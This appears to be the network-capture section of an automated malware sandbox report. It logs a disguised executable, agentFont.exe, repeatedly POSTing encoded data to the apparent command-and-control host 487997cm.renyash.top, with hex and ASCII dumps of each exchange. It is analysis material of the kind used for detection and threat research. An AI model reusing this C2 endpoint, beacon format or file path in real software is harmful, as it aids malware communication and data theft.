                                                                                  Jan 1, 2025 11:27:30.737046957 CET1324OUTData Raw: 54 53 58 5f 54 4a 55 5b 59 5f 5b 52 5a 5a 59 52 55 52 54 5c 51 5e 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX_TJU[Y_[RZZYRURT\Q^[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^<!)#-2D97U$?X$*5&-U$)W+'#"."?&X"#\.
                                                                                  Jan 1, 2025 11:27:31.017585039 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:31.145549059 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 07 3e 1f 30 00 24 05 31 52 24 3e 3f 56 29 30 32 5d 3b 3f 3d 10 31 04 2b 00 28 0d 30 0a 3c 05 2a 15 2a 2d 2c 11 32 0c 34 54 31 35 2a 51 00 1c 23 5a 2b 2b 2b 59 3f 28 0f 0d 3d 21 28 07 2b 02 15 5a 21 14 38 0d 30 15 04 54 24 13 06 02 28 01 34 1c 2f 35 02 06 2c 33 06 02 30 0c 2f 52 09 14 21 11 2a 30 34 08 25 31 3e 5e 26 30 37 5b 22 01 33 13 34 22 35 57 37 1d 0d 5b 28 13 24 03 36 32 39 01 25 12 0f 18 3f 03 06 0b 22 14 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $>0$1R$>?V)02];?=1+(0<**-,24T15*Q#Z+++Y?(=!(+Z!80T$(4/5,30/R!*04%1>^&07["34"5W7[($629%?"#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.449753185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:30.519539118 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:30.877692938 CET1044OUTData Raw: 51 51 58 5c 54 45 50 5e 59 5f 5b 52 5a 59 59 5c 55 51 54 5d 51 5b 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQX\TEP^Y_[RZYY\UQT]Q[[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?2!T4=;1"@9;2Y-0<-"6!U%<!>(6-?&X"#\.$
                                                                                  Jan 1, 2025 11:27:31.175710917 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:31.309974909 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.449754185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:31.459279060 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:31.815197945 CET1044OUTData Raw: 51 50 5d 5a 51 40 55 5e 59 5f 5b 52 5a 5c 59 50 55 5e 54 5b 51 5b 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]ZQ@U^Y_[RZ\YPU^T[Q[[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(1=4=X&A.-$29$^!&=0,1R>''["->?:&X"#\.0
                                                                                  Jan 1, 2025 11:27:32.096546888 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:32.230317116 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.449755185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:32.377866983 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:32.737788916 CET1044OUTData Raw: 51 55 5d 5a 54 4b 50 5e 59 5f 5b 52 5a 5f 59 54 55 51 54 50 51 59 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU]ZTKP^Y_[RZ_YTUQTPQY[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^<29W7-,X%%:;W&<2_$*X6%-P%?=?![!]+:&X"#\.<
                                                                                  Jan 1, 2025 11:27:33.035856962 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:33.170300007 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:29 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.449756185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:33.370345116 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:33.721585035 CET1044OUTData Raw: 54 54 5d 5a 54 40 50 5c 59 5f 5b 52 5a 5d 59 52 55 54 54 5d 51 5f 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]ZT@P\Y_[RZ]YRUTT]Q_[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<"-$Y1=-9/T2<&3?*Z!&=0)P= "&(:&X"#\.
                                                                                  Jan 1, 2025 11:27:34.036830902 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:34.166069031 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.449757185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:34.293577909 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:34.643373013 CET1044OUTData Raw: 54 53 5d 5a 51 40 55 5f 59 5f 5b 52 5a 52 59 54 55 53 54 50 51 58 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS]ZQ@U_Y_[RZRYTUSTPQX[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?5V#=,1-&.>8&=',)!6=P3<6)$3]6.5+&X"#\.
                                                                                  Jan 1, 2025 11:27:34.940473080 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:35.076160908 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.449758185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:35.209778070 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:35.571319103 CET1044OUTData Raw: 54 53 5d 53 51 40 55 50 59 5f 5b 52 5a 5c 59 56 55 56 54 5a 51 5e 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS]SQ@UPY_[RZ\YVUVTZQ^[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?2-S4 Y%&A:;U&<=%,65!U3-R=[5>%?&X"#\.0
                                                                                  Jan 1, 2025 11:27:35.846676111 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:35.974225044 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.449759185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:36.147376060 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:36.502698898 CET1044OUTData Raw: 54 52 58 5c 54 44 55 5a 59 5f 5b 52 5a 59 59 56 55 50 54 5f 51 5d 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TRX\TDUZY_[RZYYVUPT_Q][Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(- .429-T%-%,95%2%?2+$0!>9+*&X"#\.$
                                                                                  Jan 1, 2025 11:27:36.803363085 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:37.129834890 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W
                                                                                  Jan 1, 2025 11:27:37.129868031 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.449760185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:36.165039062 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:36.518277884 CET1340OUTData Raw: 54 51 58 5f 54 46 55 50 59 5f 5b 52 5a 5f 59 5d 55 53 54 5f 51 5b 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TQX_TFUPY_[RZ_Y]UST_Q[[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?" >$&.:E-=%\$,6$/5W)$3Z!&+*&X"#\.<
                                                                                  Jan 1, 2025 11:27:36.805473089 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:37.129849911 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 03 2a 25 20 03 27 02 25 50 30 3d 27 56 28 0d 0b 04 3b 02 0f 11 26 3a 33 02 3c 23 05 52 3f 05 22 17 3f 03 3f 04 31 22 34 1f 24 25 2a 51 00 1c 20 02 28 38 34 06 3c 5e 3d 09 29 21 01 15 2b 02 16 04 21 14 30 0e 27 2b 3a 57 25 2e 34 03 2b 01 06 50 38 25 05 5f 2f 33 09 5a 27 1c 2f 52 09 14 21 12 3e 30 37 13 26 21 3a 58 24 33 37 58 22 3b 38 0c 34 21 3a 0e 23 0a 33 5c 3c 3e 3b 5a 22 21 3e 58 26 05 21 1b 2b 2d 09 50 35 14 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $*% '%P0='V(;&:3<#R?"??1"4$%*Q (84<^=)!+!0'+:W%.4+P8%_/3Z'/R!>07&!:X$37X";84!:#3\<>;Z"!>X&!+-P5#T,#V6]Q
                                                                                  Jan 1, 2025 11:27:37.129858971 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 03 2a 25 20 03 27 02 25 50 30 3d 27 56 28 0d 0b 04 3b 02 0f 11 26 3a 33 02 3c 23 05 52 3f 05 22 17 3f 03 3f 04 31 22 34 1f 24 25 2a 51 00 1c 20 02 28 38 34 06 3c 5e 3d 09 29 21 01 15 2b 02 16 04 21 14 30 0e 27 2b 3a 57 25 2e 34 03 2b 01 06 50 38 25 05 5f 2f 33 09 5a 27 1c 2f 52 09 14 21 12 3e 30 37 13 26 21 3a 58 24 33 37 58 22 3b 38 0c 34 21 3a 0e 23 0a 33 5c 3c 3e 3b 5a 22 21 3e 58 26 05 21 1b 2b 2d 09 50 35 14 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $*% '%P0='V(;&:3<#R?"??1"4$%*Q (84<^=)!+!0'+:W%.4+P8%_/3Z'/R!>07&!:X$37X";84!:#3\<>;Z"!>X&!+-P5#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.449761185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:37.284965992 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:37.643317938 CET1044OUTData Raw: 51 51 58 5b 51 41 55 5a 59 5f 5b 52 5a 5f 59 52 55 53 54 51 51 59 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQX[QAUZY_[RZ_YRUSTQQY[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]+W#=8Y%:-4%?:_0/>66-U$W)4#\#>=X<:&X"#\.<
                                                                                  Jan 1, 2025 11:27:37.941657066 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:38.074311018 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.449762185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:38.214088917 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:38.565242052 CET1044OUTData Raw: 54 50 5d 5d 54 42 50 5e 59 5f 5b 52 5a 52 59 54 55 51 54 59 51 59 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]]TBP^Y_[RZRYTUQTYQY[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._)1)#.+$-:. &_$Z*Z!%,5Q+$'#=5]<*&X"#\.
                                                                                  Jan 1, 2025 11:27:38.851011038 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:38.982659101 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:35 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.449763185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:39.115469933 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:39.471426964 CET1040OUTData Raw: 54 52 58 5f 54 42 55 5d 59 5f 5b 52 5a 5a 59 50 55 53 54 51 51 5e 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TRX_TBU]Y_[RZZYPUSTQQ^[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?6 -4%.5-[,2?.'5-T'?*4'!%(:&X"#\.<
                                                                                  Jan 1, 2025 11:27:39.752813101 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:39.882049084 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.449764185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:40.032679081 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:40.377691031 CET1044OUTData Raw: 54 5b 58 5e 51 44 55 51 59 5f 5b 52 5a 59 59 50 55 55 54 59 51 5b 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[X^QDUQY_[RZYYPUUTYQ[[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\+1%W7 1>&C:[,%=$*!&"$,1+'3^#>=_(&X"#\.$
                                                                                  Jan 1, 2025 11:27:40.668876886 CET25INHTTP/1.1 100 Continue
